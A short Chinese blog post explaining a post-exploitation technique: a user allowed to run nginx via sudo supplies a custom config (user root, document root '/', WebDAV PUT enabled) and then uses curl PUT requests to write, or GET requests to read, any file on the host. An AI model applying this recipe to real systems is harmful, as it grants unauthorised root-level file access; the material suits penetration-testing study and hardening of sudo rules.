Nginx配置漏洞利用(后渗透)- sudo nginx

如果普通用户可以以更高权限的用户执行nginx命令,拥有sudo权限,
比如,查看sudo权限:
sudo -l
...
(ALL : ALL) NOPASSWD: /usr/sbin/nginx

可以利用nginx配置文件实现提权。
具体来说,如果可以以root身份运行nginx,就可以利用nginx配置文件做到把任意文件上传到主机的任意位置,或者下载和读取任意文件。

使用如下命令指定nginx配置文件
nginx -c /file/to/configration_file

nginx配置文件可以这样写:
nginx.config
----------------------------------------
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
        worker_connections 768;
}
http {
        server {
                listen 1339;
                root /;
                autoindex on;
                dav_methods PUT;
        }
}
----------------------------------------
配置文件指定了监听端口是1339,指定了nginx的根目录是/,启用了PUT方法。

此时如果可以从其他主机访问,或者从目标主机本地访问,可以进行这样的文件上传操作:
curl -X PUT -T /file/to/upload_file http://IP:1339/dir/file
把本地的upload_file文件上传到目标主机。
同时也可以直接下载目标主机上的文件,只要可以访问到。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值